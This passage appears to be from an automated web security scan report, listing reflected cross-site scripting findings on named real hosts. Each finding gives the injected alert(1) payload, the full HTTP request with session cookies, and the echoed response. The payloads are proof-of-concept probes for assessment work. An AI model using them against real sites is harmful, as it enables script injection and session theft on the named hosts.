GET /sites/all/themes/threesixty/js/swfobject.js8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-swfobject.js8edfa"><img src=a onerror=alert(1)>6de297366e6 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.156. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58 was submitted in the REST URL parameter 1. This input was echoed as ad216"><img src=a onerror=alert(1)>a10ddffaa58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58/default/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesad216"><img src=a onerror=alert(1)>a10ddffaa58-default-files-blogger-Michael-0.jpg not-front not-logged-in page-sitesad216img-srca-onerroralert1a10ddffaa58 no-sidebars">
...[SNIP]...

3.157. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f was submitted in the REST URL parameter 2. This input was echoed as f18ea"><img src=a onerror=alert(1)>393e7302d5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/defaultf18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-defaultf18ea"><img src=a onerror=alert(1)>393e7302d5f-files-blogger-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.158. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0 was submitted in the REST URL parameter 3. This input was echoed as 9ef90"><img src=a onerror=alert(1)>15718a32de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0/blogger/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files9ef90"><img src=a onerror=alert(1)>15718a32de0-blogger-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.159. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7 was submitted in the REST URL parameter 4. This input was echoed as e0192"><img src=a onerror=alert(1)>5cdb37c2fc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/bloggere0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7/Michael_0.jpg?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-bloggere0192"><img src=a onerror=alert(1)>5cdb37c2fc7-Michael-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.160. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Michael_0.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0 was submitted in the REST URL parameter 5. This input was echoed as 279d9"><img src=a onerror=alert(1)>8079457cfc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger/Michael_0.jpg279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0?1262947422 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:48:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:48:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger-Michael-0.jpg279d9"><img src=a onerror=alert(1)>8079457cfc0 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.161. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315 was submitted in the REST URL parameter 1. This input was echoed as a1d31"><img src=a onerror=alert(1)>5fcd56ff315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesa1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315/default/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesa1d31"><img src=a onerror=alert(1)>5fcd56ff315-default-files-blogger-Wendy-0.jpg not-front not-logged-in page-sitesa1d31img-srca-onerroralert15fcd56ff315 no-sidebars">
...[SNIP]...

3.162. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029 was submitted in the REST URL parameter 2. This input was echoed as 5595f"><img src=a onerror=alert(1)>ef72e250029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default5595f"><img src=a onerror=alert(1)>ef72e250029-files-blogger-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.163. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5 was submitted in the REST URL parameter 3. This input was echoed as ca239"><img src=a onerror=alert(1)>355951df0a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/filesca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5/blogger/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-filesca239"><img src=a onerror=alert(1)>355951df0a5-blogger-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.164. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0 was submitted in the REST URL parameter 4. This input was echoed as 13886"><img src=a onerror=alert(1)>61979da1bf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0/Wendy_0.jpg?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger13886"><img src=a onerror=alert(1)>61979da1bf0-Wendy-0.jpg not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.165. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/default/files/blogger/Wendy_0.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab was submitted in the REST URL parameter 5. This input was echoed as 2e68b"><img src=a onerror=alert(1)>5d1d857a6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/default/files/blogger/Wendy_0.jpg2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab?1262947372 HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:47:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:47:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-default-files-blogger-Wendy-0.jpg2e68b"><img src=a onerror=alert(1)>5d1d857a6ab not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.166. http://jobs.ctg.eu/we-promise [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /we-promise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d was submitted in the REST URL parameter 1. This input was echoed as 4549d"><img src=a onerror=alert(1)>a96526d001d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /we-promise4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/jobs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; has_js=1; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:21:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 17:21:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="we-promise4549d"><img src=a onerror=alert(1)>a96526d001d not-front not-logged-in page-we-promise4549dimg-srca-onerroralert1a96526d001d no-sidebars">
...[SNIP]...

3.167. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e0625<script>alert(1)</script>bfb396fceb was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E05511e0625<script>alert(1)</script>bfb396fceb HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
